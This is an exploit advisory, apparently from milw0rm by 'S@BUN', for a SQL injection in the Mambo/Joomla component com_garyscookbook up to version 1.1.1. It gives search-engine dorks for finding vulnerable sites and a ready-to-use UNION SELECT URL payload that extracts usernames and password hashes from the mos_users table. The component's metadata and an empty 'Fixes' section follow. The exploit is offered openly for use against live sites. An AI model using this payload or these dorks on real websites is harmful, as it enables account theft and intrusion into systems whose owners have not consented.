Mambo Component garyscookbook <= 1.1.1 SQL Injection Vulnerability

2008-02-23 00:00:00

###############################################################
#
# joomla com_garyscookbook SQL Injection(id)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################
#
# there are alot site but exploit not working for all ı found alot
#
# DORK 1 : allinurl:"com_garyscookbook"
#
# DORK 2 : allinurl: com_garyscookbook "detail"
#
################################################################
EXPLOIT :

index.php?option=com_garyscookbook&Itemid=S@BUN&func=detail&id=-666/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,username+from%2F%2A%2A%2Fmos_users/*


################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################

<name>garyscookbook</name>
<creationDate>4-9-2005</creationDate>
<author>Gerald Berger</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>[email protected]</authorEmail>

<authorUrl>www.vb-dozent.net</authorUrl>
<version>1.1.1</version>
<description>Garys Cookbook is a fully integrated Mambo Cookbook component.</description>

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.